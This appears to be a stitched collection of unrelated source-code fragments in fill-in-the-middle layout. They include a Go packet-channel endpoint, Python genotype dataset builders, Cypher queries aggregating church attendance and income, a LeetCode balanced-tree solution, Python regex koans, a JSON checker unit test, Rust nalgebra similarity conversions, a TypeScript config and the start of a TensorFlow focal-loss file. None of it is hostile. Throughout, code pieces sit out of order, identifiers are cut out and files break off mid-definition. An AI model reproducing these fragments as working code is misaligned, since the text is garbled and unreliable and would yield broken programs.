func (e *Endpoint) InjectInbound(protocol tcpip.NetworkProtocolNumber, pkt *stack.PacketBuffer) {
e.InjectLinkAddr(protocol, "", pkt)
}
// InjectLinkAddr injects an inbound packet with a remote link address.
func (e *Endpoint) InjectLinkAddr(protocol tcpip.NetworkProtocolNumber, remote tcpip.LinkAddress, pkt *stack.PacketBuffer) {
e.dispatcher.DeliverNetworkPacket(remote, "" /* local */, protocol, pkt)
}
// Attach saves the stack network-layer dispatcher for use later when packets
// are injected.
func (e *Endpoint) Attach(dispatcher stack.NetworkDispatcher) {
e.dispatcher = dispatcher
}
// IsAttached implements stack.LinkEndpoint.IsAttached.
func (e *Endpoint) IsAttached() bool {
return e.dispatcher != nil
}
// MTU implements stack.LinkEndpoint.MTU. It returns the value initialized
// during construction.
func (e *Endpoint) MTU() uint32 {
return e.mtu
}
// Capabilities implements stack.LinkEndpoint.Capabilities.
func (e *Endpoint) Capabilities() stack.LinkEndpointCapabilities {
return e.LinkEPCapabilities
}
// GSOMaxSize returns the maximum GSO packet size.
func (*Endpoint) GSOMaxSize() uint32 {
return 1 << 15
}
// MaxHeaderLength returns the maximum size of the link layer header. Given it
// doesn't have a header, it just returns 0.
func (*Endpoint) MaxHeaderLength() uint16 {
return 0
}
// LinkAddress returns the link address of this endpoint.
func (e *Endpoint) LinkAddress() tcpip.LinkAddress {
return e.linkAddr
}
// WritePacket stores outbound packets into the channel.
func (e *Endpoint) WritePacket(r stack.RouteInfo, protocol tcpip.NetworkProtocolNumber, pkt *stack.PacketBuffer) tcpip.Error {
p := PacketInfo{
Pkt: pkt,
Proto: protocol,
Route: r,
}
e.q.Write(p)
return nil
}
// WritePackets stores outbound packets into the channel.
func (e *Endpoint) WritePackets(r stack.RouteInfo, pkts stack.PacketBufferList, protocol tcpip.NetworkProtocolNumber) (int, tcpip.Error) {
n := 0
for pkt := pkts.Front(); pkt != nil; pkt = pkt.Next() {
p := PacketInfo{
Pkt: pkt,
Proto: protocol,
Route: r,
}
if !e.q.Write(p) {
break
}
n++
}
return n, nil
}
// Wait implements stack.LinkEndpoint.Wait.
func (*Endpoint) Wait() {}
// AddNotify adds a notification target for receiving event about outgoing
// packets.
func (e *Endpoint) AddNotify(notify Notification) *NotificationHandle {
return e.q.AddNotify(notify)
}
// RemoveNotify removes handle from the list of notification targets.
func (e *Endpoint) RemoveNotify(handle *NotificationHandle) {
e.q.RemoveNotify(handle)
}
// ARPHardwareType implements stack.LinkEndpoint.ARPHardwareType.
func (*Endpoint) ARPHardwareType() header.ARPHardwareType {
return header.ARPHardwareNone
}
// AddHeader implements stack.LinkEndpoint.AddHeader.
func (e *Endpoint) AddHeader(local, remote tcpip.LinkAddress, protocol tcpip.NetworkProtocolNumber, pkt *stack.PacketBuffer) {
}
| {
return &Endpoint{
q: &queue{
c: make(chan PacketInfo, size),
},
mtu: mtu,
linkAddr: linkAddr,
}
} |
model.py | from typing import Any, Dict, Hashable, List, Optional
import numpy as np
import xarray as xr
from .typing import ArrayLike
from .utils import create_dataset
DIM_VARIANT = "variants"
DIM_SAMPLE = "samples"
DIM_PLOIDY = "ploidy"
DIM_ALLELE = "alleles"
DIM_GENOTYPE = "genotypes"
def create_genotype_call_dataset(
*,
variant_contig_names: List[str],
variant_contig: ArrayLike,
variant_position: ArrayLike,
variant_allele: ArrayLike,
sample_id: ArrayLike,
call_genotype: ArrayLike,
call_genotype_phased: Optional[ArrayLike] = None,
variant_id: Optional[ArrayLike] = None,
mixed_ploidy: bool = False,
) -> xr.Dataset:
"""Create a dataset of genotype calls.
Parameters
----------
variant_contig_names
The contig names.
variant_contig
[array_like, element type: int]
The (index of the) contig for each variant. | variant_position
[array_like, element type: int]
The reference position of the variant.
variant_allele
[array_like, element_type: zero-terminated bytes, e.g. "S1", or object]
The possible alleles for the variant.
sample_id
[array_like, element type: str or object]
The unique identifier of the sample.
call_genotype
[array_like, element type: int] Genotype, encoded as allele values
(0 for the reference, 1 for the first allele, 2 for the second allele),
or -1 to indicate a missing value.
call_genotype_phased
[array_like, element type: bool, optional] A flag for each call indicating if it is
phased or not. If omitted all calls are unphased.
variant_id
[array_like, element type: str or object, optional]
The unique identifier of the variant.
mixed_ploidy
Specify if the dataset contains genotype calls with a mixture of ploidy levels
using the value -2 to indicate non-alleles.
Returns
-------
The dataset of genotype calls.
"""
data_vars: Dict[Hashable, Any] = {
"variant_contig": ([DIM_VARIANT], variant_contig),
"variant_position": ([DIM_VARIANT], variant_position),
"variant_allele": ([DIM_VARIANT, DIM_ALLELE], variant_allele),
"sample_id": ([DIM_SAMPLE], sample_id),
"call_genotype": (
[DIM_VARIANT, DIM_SAMPLE, DIM_PLOIDY],
call_genotype,
{"mixed_ploidy": mixed_ploidy},
),
"call_genotype_mask": (
[DIM_VARIANT, DIM_SAMPLE, DIM_PLOIDY],
call_genotype < 0,
),
}
if call_genotype_phased is not None:
data_vars["call_genotype_phased"] = (
[DIM_VARIANT, DIM_SAMPLE],
call_genotype_phased,
)
if mixed_ploidy is True:
data_vars["call_genotype_non_allele"] = (
[DIM_VARIANT, DIM_SAMPLE, DIM_PLOIDY],
call_genotype < -1,
)
if variant_id is not None:
data_vars["variant_id"] = ([DIM_VARIANT], variant_id)
attrs: Dict[Hashable, Any] = {"contigs": variant_contig_names}
return create_dataset(data_vars=data_vars, attrs=attrs)
def create_genotype_dosage_dataset(
*,
variant_contig_names: List[str],
variant_contig: ArrayLike,
variant_position: ArrayLike,
variant_allele: ArrayLike,
sample_id: ArrayLike,
call_dosage: ArrayLike,
call_genotype_probability: ArrayLike,
variant_id: Optional[ArrayLike] = None,
) -> xr.Dataset:
"""Create a dataset of genotype dosages.
Parameters
----------
variant_contig_names
The contig names.
variant_contig
[array_like, element type: int]
The (index of the) contig for each variant.
variant_position
[array_like, element type: int]
The reference position of the variant.
variant_allele
[array_like, element_type: zero-terminated bytes, e.g. "S1", or object]
The possible alleles for the variant.
sample_id
[array_like, element type: str or object]
The unique identifier of the sample.
call_dosage
[array_like, element type: float]
Dosages, encoded as floats, with NaN indicating a
missing value.
call_genotype_probability
[array_like, element type: float]
Probabilities, encoded as floats, with NaN indicating a
missing value.
variant_id
[array_like, element type: str or object, optional]
The unique identifier of the variant.
Returns
-------
The dataset of genotype calls.
"""
data_vars: Dict[Hashable, Any] = {
"variant_contig": ([DIM_VARIANT], variant_contig),
"variant_position": ([DIM_VARIANT], variant_position),
"variant_allele": ([DIM_VARIANT, DIM_ALLELE], variant_allele),
"sample_id": ([DIM_SAMPLE], sample_id),
"call_dosage": ([DIM_VARIANT, DIM_SAMPLE], call_dosage),
"call_dosage_mask": ([DIM_VARIANT, DIM_SAMPLE], np.isnan(call_dosage)),
"call_genotype_probability": (
[DIM_VARIANT, DIM_SAMPLE, DIM_GENOTYPE],
call_genotype_probability,
),
"call_genotype_probability_mask": (
[DIM_VARIANT, DIM_SAMPLE, DIM_GENOTYPE],
np.isnan(call_genotype_probability),
),
}
if variant_id is not None:
data_vars["variant_id"] = ([DIM_VARIANT], variant_id)
attrs: Dict[Hashable, Any] = {"contigs": variant_contig_names}
return create_dataset(data_vars=data_vars, attrs=attrs) | |
component-service-cypher.js | // Adding the records of the services underneath so that we can have the total attendances and incomes
export const componentServiceAggregates = `
MATCH (church {id:$id}) WHERE church:Bacenta OR church:Constituency OR church:Council OR church:Stream OR church:GatheringService
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..5]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentBacentaServiceAggregates = `
MATCH (church:Bacenta {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentConstituencyServiceAggregates = `
MATCH (church:Constituency {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..2]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
| RETURN week AS week, SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentCouncilServiceAggregates = `
MATCH (church:Council {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..3]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentStreamServiceAggregates = `
MATCH (church:Stream {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..4]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentGatheringServiceServiceAggregates = `
MATCH (church:GatheringService {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..5]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week, SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
` | MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
|
110. Balanced Binary Tree.go | package algorithms
import (
"github.com/ljun20160606/leetcode/algorithms"
)
/**
* Definition for a binary tree node.
* type TreeNode struct {
* Val int
* Left *TreeNode
* Right *TreeNode
* }
*/
type TreeNode = algorithms.TreeNode
func isBalanced(root *TreeNode) bool {
if root == nil {
return true
}
diff := heightOfTree(root.Left) - heightOfTree(root.Right)
return diff >= -1 && diff <= 1 && isBalanced(root.Left) && isBalanced(root.Right)
}
func heightOfTree(root *TreeNode) int {
if root == nil {
return 0
}
if root.Left == nil && root.Right == nil {
return 1
}
if root.Left == nil |
if root.Right == nil {
return heightOfTree(root.Left) + 1
}
left := heightOfTree(root.Left)
right := heightOfTree(root.Right)
if left > right {
return left + 1
}
return right + 1
}
| {
return heightOfTree(root.Right) + 1
} |
about_regex.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import re
class | (Koan):
"""
These koans are based on Ben's book: Regular Expressions in 10
minutes. I found this book very useful, so I decided to write
a koan file in order to practice everything it taught me.
http://www.forta.com/books/0672325667/
"""
def test_matching_literal_text(self):
"""
Lesson 1 Matching Literal String
"""
string = "Hello, my name is Felix and these koans are based " + \
"on Ben's book: Regular Expressions in 10 minutes."
m = re.search('Felix', string)
self.assertTrue(
m and m.group(0) and
m.group(0) == 'Felix',
"I want my name")
def test_matching_literal_text_how_many(self):
"""
Lesson 1 -- How many matches?
The default behaviour of most regular expression engines is
to return just the first match. In python you have the
following options:
match() --> Determine if the RE matches at the
beginning of the string.
search() --> Scan through a string, looking for any
location where this RE matches.
findall() --> Find all substrings where the RE
matches, and return them as a list.
finditer() --> Find all substrings where the RE
matches, and return them as an iterator.
"""
string = ("Hello, my name is Felix and these koans are based " +
"on Ben's book: Regular Expressions in 10 minutes. " +
"Repeat My name is Felix")
m = re.match('Felix', string) # TIP: match may not be the best option
# I want to know how many times my name appears
self.assertEqual(m, None)
def test_matching_literal_text_not_case_sensitivity(self):
"""
Lesson 1 -- Matching Literal String non case sensitivity.
Most regex implementations also support matches that are not
case sensitive. In python you can use re.IGNORECASE, in
Javascript you can specify the optional i flag. In Ben's
book you can see more languages.
"""
string = "Hello, my name is Felix or felix and this koan " + \
"is based on Ben's book: Regular Expressions in 10 minutes."
self.assertEqual(re.findall("felix", string), ['felix'])
self.assertEqual(re.findall("felix", string, re.IGNORECASE), ['Felix', 'felix'])
def test_matching_any_character(self):
"""
Lesson 1: Matching any character
`.` matches any character: alphabetic characters, digits,
and punctuation.
"""
string = "pecks.xlx\n" \
+ "orders1.xls\n" \
+ "apec1.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls"
# I want to find all uses of myArray
change_this_search_string = 'a..xls'
self.assertEquals(
len(re.findall(change_this_search_string, string)),
3)
def test_matching_set_character(self):
"""
Lesson 2 -- Matching sets of characters
A set of characters is defined using the metacharacters
`[` and `]`. Everything between them is part of the set, and
any single one of the set members will match.
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find all files for North America(na) or South
# America(sa), but not (ca) TIP you can use the pattern .a.
# which matches in above test but in this case matches more than
# you want
change_this_search_string = '[ns]a[1-9].xls'
self.assertEquals(
len(re.findall(change_this_search_string, string)),
3)
def test_anything_but_matching(self):
"""
Lesson 2 -- Using character set ranges
Occasionally, you'll have a list of characters that you don't
want to match. Character sets can be negated using the ^
metacharacter.
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "sales3.xls\n" \
+ "europe2.xls\n" \
+ "sam.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find the name 'sam'
change_this_search_string = '[^nc]am.xls'
self.assertEquals(
re.findall(change_this_search_string, string),
['sam.xls'])
| AboutRegex |
jsonchecker_unittest.py | # Copyright (C) 2010 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for jsonchecker.py."""
import unittest
from blinkpy.style.checkers import jsonchecker
class MockErrorHandler(object):
def __init__(self, handle_style_error):
self.turned_off_filtering = False
self._handle_style_error = handle_style_error
def turn_off_line_filtering(self):
self.turned_off_filtering = True
def __call__(self, line_number, category, confidence, message):
self._handle_style_error(self, line_number, category, confidence, message)
return True
class JSONCheckerTest(unittest.TestCase):
"""Tests JSONChecker class."""
def | (self):
tests = (
(0, 'No JSON object could be decoded'),
(2, 'Expecting property name: line 2 column 1 (char 2)'),
(3, 'Expecting object: line 3 column 1 (char 15)'),
(9, 'Expecting property name: line 9 column 21 (char 478)'),
)
for expected_line, message in tests:
self.assertEqual(expected_line, jsonchecker.JSONChecker.line_number_from_json_exception(ValueError(message)))
def assert_no_error(self, json_data):
def handle_style_error(mock_error_handler, line_number, category, confidence, message):
self.fail('Unexpected error: %d %s %d %s' % (line_number, category, confidence, message))
error_handler = MockErrorHandler(handle_style_error)
checker = jsonchecker.JSONChecker('foo.json', error_handler)
checker.check(json_data.split('\n'))
self.assertTrue(error_handler.turned_off_filtering)
def assert_error(self, expected_line_number, expected_category, json_data):
def handle_style_error(mock_error_handler, line_number, category, confidence, message):
mock_error_handler.had_error = True
self.assertEqual(expected_line_number, line_number)
self.assertEqual(expected_category, category)
self.assertIn(category, jsonchecker.JSONChecker.categories)
error_handler = MockErrorHandler(handle_style_error)
error_handler.had_error = False
checker = jsonchecker.JSONChecker('foo.json', error_handler)
checker.check(json_data.split('\n'))
self.assertTrue(error_handler.had_error)
self.assertTrue(error_handler.turned_off_filtering)
def mock_handle_style_error(self):
pass
def test_conflict_marker(self):
self.assert_error(0, 'json/syntax', '<<<<<<< HEAD\n{\n}\n')
def test_single_quote(self):
self.assert_error(2, 'json/syntax', "{\n'slaves': []\n}\n")
def test_init(self):
error_handler = MockErrorHandler(self.mock_handle_style_error)
checker = jsonchecker.JSONChecker('foo.json', error_handler)
self.assertEqual(checker._handle_style_error, error_handler)
def test_no_error(self):
self.assert_no_error("""{
"slaves": [ { "name": "test-slave", "platform": "*" },
{ "name": "apple-xserve-4", "platform": "mac-snowleopard" }
],
"builders": [ { "name": "SnowLeopard Intel Release (Build)", "type": "Build", "builddir": "snowleopard-intel-release",
"platform": "mac-snowleopard", "configuration": "release", "architectures": ["x86_64"],
"slavenames": ["apple-xserve-4"]
}
],
"schedulers": [ { "type": "PlatformSpecificScheduler", "platform": "mac-snowleopard", "branch": "trunk", "treeStableTimer": 45.0,
"builderNames": ["SnowLeopard Intel Release (Build)", "SnowLeopard Intel Debug (Build)"]
}
]
}
""")
| test_line_number_from_json_exception |
similarity_conversion.rs | use num::Zero;
use simba::scalar::{RealField, SubsetOf, SupersetOf};
use simba::simd::{PrimitiveSimdValue, SimdRealField, SimdValue};
use crate::base::allocator::Allocator;
use crate::base::dimension::{DimMin, DimName, DimNameAdd, DimNameSum, U1};
use crate::base::{DefaultAllocator, MatrixN, Scalar};
use crate::geometry::{
AbstractRotation, Isometry, Similarity, SuperTCategoryOf, TAffine, Transform, Translation,
};
/*
* This file provides the following conversions:
* =============================================
*
* Similarity -> Similarity
* Similarity -> Transform
* Similarity -> Matrix (homogeneous)
*/
impl<N1, N2, D: DimName, R1, R2> SubsetOf<Similarity<N2, D, R2>> for Similarity<N1, D, R1>
where
N1: RealField + SubsetOf<N2>,
N2: RealField + SupersetOf<N1>,
R1: AbstractRotation<N1, D> + SubsetOf<R2>,
R2: AbstractRotation<N2, D>,
DefaultAllocator: Allocator<N1, D> + Allocator<N2, D>,
{
#[inline]
fn to_superset(&self) -> Similarity<N2, D, R2> {
Similarity::from_isometry(self.isometry.to_superset(), self.scaling().to_superset())
}
#[inline]
fn is_in_subset(sim: &Similarity<N2, D, R2>) -> bool {
crate::is_convertible::<_, Isometry<N1, D, R1>>(&sim.isometry)
&& crate::is_convertible::<_, N1>(&sim.scaling())
}
#[inline]
fn from_superset_unchecked(sim: &Similarity<N2, D, R2>) -> Self {
Similarity::from_isometry(
sim.isometry.to_subset_unchecked(),
sim.scaling().to_subset_unchecked(),
)
}
}
impl<N1, N2, D, R, C> SubsetOf<Transform<N2, D, C>> for Similarity<N1, D, R>
where
N1: RealField,
N2: RealField + SupersetOf<N1>,
C: SuperTCategoryOf<TAffine>,
R: AbstractRotation<N1, D>
+ SubsetOf<MatrixN<N1, DimNameSum<D, U1>>>
+ SubsetOf<MatrixN<N2, DimNameSum<D, U1>>>,
D: DimNameAdd<U1> + DimMin<D, Output = D>, // needed by .determinant()
DefaultAllocator: Allocator<N1, D>
+ Allocator<N1, D, D>
+ Allocator<N1, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<(usize, usize), D>
+ Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<N2, D, D>
+ Allocator<N2, D>,
{ |
#[inline]
fn is_in_subset(t: &Transform<N2, D, C>) -> bool {
<Self as SubsetOf<_>>::is_in_subset(t.matrix())
}
#[inline]
fn from_superset_unchecked(t: &Transform<N2, D, C>) -> Self {
Self::from_superset_unchecked(t.matrix())
}
}
impl<N1, N2, D, R> SubsetOf<MatrixN<N2, DimNameSum<D, U1>>> for Similarity<N1, D, R>
where
N1: RealField,
N2: RealField + SupersetOf<N1>,
R: AbstractRotation<N1, D>
+ SubsetOf<MatrixN<N1, DimNameSum<D, U1>>>
+ SubsetOf<MatrixN<N2, DimNameSum<D, U1>>>,
D: DimNameAdd<U1> + DimMin<D, Output = D>, // needed by .determinant()
DefaultAllocator: Allocator<N1, D>
+ Allocator<N1, D, D>
+ Allocator<N1, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<(usize, usize), D>
+ Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<N2, D, D>
+ Allocator<N2, D>,
{
#[inline]
fn to_superset(&self) -> MatrixN<N2, DimNameSum<D, U1>> {
self.to_homogeneous().to_superset()
}
#[inline]
fn is_in_subset(m: &MatrixN<N2, DimNameSum<D, U1>>) -> bool {
let mut rot = m.fixed_slice::<D, D>(0, 0).clone_owned();
if rot
.fixed_columns_mut::<U1>(0)
.try_normalize_mut(N2::zero())
.is_some()
&& rot
.fixed_columns_mut::<U1>(1)
.try_normalize_mut(N2::zero())
.is_some()
&& rot
.fixed_columns_mut::<U1>(2)
.try_normalize_mut(N2::zero())
.is_some()
{
// FIXME: could we avoid explicit the computation of the determinant?
// (its sign is needed to see if the scaling factor is negative).
if rot.determinant() < N2::zero() {
rot.fixed_columns_mut::<U1>(0).neg_mut();
rot.fixed_columns_mut::<U1>(1).neg_mut();
rot.fixed_columns_mut::<U1>(2).neg_mut();
}
let bottom = m.fixed_slice::<U1, D>(D::dim(), 0);
// Scalar types agree.
m.iter().all(|e| SupersetOf::<N1>::is_in_subset(e)) &&
// The normalized block part is a rotation.
// rot.is_special_orthogonal(N2::default_epsilon().sqrt()) &&
// The bottom row is (0, 0, ..., 1)
bottom.iter().all(|e| e.is_zero()) && m[(D::dim(), D::dim())] == N2::one()
} else {
false
}
}
#[inline]
fn from_superset_unchecked(m: &MatrixN<N2, DimNameSum<D, U1>>) -> Self {
let mut mm = m.clone_owned();
let na = mm.fixed_slice_mut::<D, U1>(0, 0).normalize_mut();
let nb = mm.fixed_slice_mut::<D, U1>(0, 1).normalize_mut();
let nc = mm.fixed_slice_mut::<D, U1>(0, 2).normalize_mut();
let mut scale = (na + nb + nc) / crate::convert(3.0); // We take the mean, for robustness.
// FIXME: could we avoid the explicit computation of the determinant?
// (its sign is needed to see if the scaling factor is negative).
if mm.fixed_slice::<D, D>(0, 0).determinant() < N2::zero() {
mm.fixed_slice_mut::<D, U1>(0, 0).neg_mut();
mm.fixed_slice_mut::<D, U1>(0, 1).neg_mut();
mm.fixed_slice_mut::<D, U1>(0, 2).neg_mut();
scale = -scale;
}
let t = m.fixed_slice::<D, U1>(0, D::dim()).into_owned();
let t = Translation {
vector: crate::convert_unchecked(t),
};
Self::from_parts(
t,
crate::convert_unchecked(mm),
crate::convert_unchecked(scale),
)
}
}
impl<N: SimdRealField, D: DimName, R> From<Similarity<N, D, R>> for MatrixN<N, DimNameSum<D, U1>>
where
D: DimNameAdd<U1>,
R: SubsetOf<MatrixN<N, DimNameSum<D, U1>>>,
DefaultAllocator: Allocator<N, D> + Allocator<N, DimNameSum<D, U1>, DimNameSum<D, U1>>,
{
#[inline]
fn from(sim: Similarity<N, D, R>) -> Self {
sim.to_homogeneous()
}
}
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
From<[Similarity<N::Element, D, R::Element>; 2]> for Similarity<N, D, R>
where
N: From<[<N as SimdValue>::Element; 2]>,
R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 2]>,
R::Element: AbstractRotation<N::Element, D>,
N::Element: Scalar + Zero + Copy,
R::Element: Scalar + Zero + Copy,
DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
#[inline]
fn from(arr: [Similarity<N::Element, D, R::Element>; 2]) -> Self {
let iso = Isometry::from([arr[0].isometry.clone(), arr[1].isometry.clone()]);
let scale = N::from([arr[0].scaling(), arr[1].scaling()]);
Self::from_isometry(iso, scale)
}
}
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
From<[Similarity<N::Element, D, R::Element>; 4]> for Similarity<N, D, R>
where
N: From<[<N as SimdValue>::Element; 4]>,
R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 4]>,
R::Element: AbstractRotation<N::Element, D>,
N::Element: Scalar + Zero + Copy,
R::Element: Scalar + Zero + Copy,
DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
#[inline]
fn from(arr: [Similarity<N::Element, D, R::Element>; 4]) -> Self {
let iso = Isometry::from([
arr[0].isometry.clone(),
arr[1].isometry.clone(),
arr[2].isometry.clone(),
arr[3].isometry.clone(),
]);
let scale = N::from([
arr[0].scaling(),
arr[1].scaling(),
arr[2].scaling(),
arr[3].scaling(),
]);
Self::from_isometry(iso, scale)
}
}
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
From<[Similarity<N::Element, D, R::Element>; 8]> for Similarity<N, D, R>
where
N: From<[<N as SimdValue>::Element; 8]>,
R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 8]>,
R::Element: AbstractRotation<N::Element, D>,
N::Element: Scalar + Zero + Copy,
R::Element: Scalar + Zero + Copy,
DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
#[inline]
fn from(arr: [Similarity<N::Element, D, R::Element>; 8]) -> Self {
let iso = Isometry::from([
arr[0].isometry.clone(),
arr[1].isometry.clone(),
arr[2].isometry.clone(),
arr[3].isometry.clone(),
arr[4].isometry.clone(),
arr[5].isometry.clone(),
arr[6].isometry.clone(),
arr[7].isometry.clone(),
]);
let scale = N::from([
arr[0].scaling(),
arr[1].scaling(),
arr[2].scaling(),
arr[3].scaling(),
arr[4].scaling(),
arr[5].scaling(),
arr[6].scaling(),
arr[7].scaling(),
]);
Self::from_isometry(iso, scale)
}
}
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
From<[Similarity<N::Element, D, R::Element>; 16]> for Similarity<N, D, R>
where
N: From<[<N as SimdValue>::Element; 16]>,
R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 16]>,
R::Element: AbstractRotation<N::Element, D>,
N::Element: Scalar + Zero + Copy,
R::Element: Scalar + Zero + Copy,
DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
#[inline]
fn from(arr: [Similarity<N::Element, D, R::Element>; 16]) -> Self {
let iso = Isometry::from([
arr[0].isometry.clone(),
arr[1].isometry.clone(),
arr[2].isometry.clone(),
arr[3].isometry.clone(),
arr[4].isometry.clone(),
arr[5].isometry.clone(),
arr[6].isometry.clone(),
arr[7].isometry.clone(),
arr[8].isometry.clone(),
arr[9].isometry.clone(),
arr[10].isometry.clone(),
arr[11].isometry.clone(),
arr[12].isometry.clone(),
arr[13].isometry.clone(),
arr[14].isometry.clone(),
arr[15].isometry.clone(),
]);
let scale = N::from([
arr[0].scaling(),
arr[1].scaling(),
arr[2].scaling(),
arr[3].scaling(),
arr[4].scaling(),
arr[5].scaling(),
arr[6].scaling(),
arr[7].scaling(),
arr[8].scaling(),
arr[9].scaling(),
arr[10].scaling(),
arr[11].scaling(),
arr[12].scaling(),
arr[13].scaling(),
arr[14].scaling(),
arr[15].scaling(),
]);
Self::from_isometry(iso, scale)
}
} | #[inline]
fn to_superset(&self) -> Transform<N2, D, C> {
Transform::from_matrix_unchecked(self.to_homogeneous().to_superset())
} |
config.ts | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License;
* you may not use this file except in compliance with the Elastic License. | // tslint:disable:no-default-export
export default createTestConfig('security_only', { disabledPlugins: ['spaces'], license: 'trial' }); | */
import { createTestConfig } from '../common/config';
|
focal_loss.py | """
AI Challenger观点型问题阅读理解
focal_loss.py
@author: yuhaitao
"""
# -*- coding:utf-8 -*-
import tensorflow as tf
def sparse_focal_loss( | amma=2):
"""
Computer focal loss for multi classification
Args:
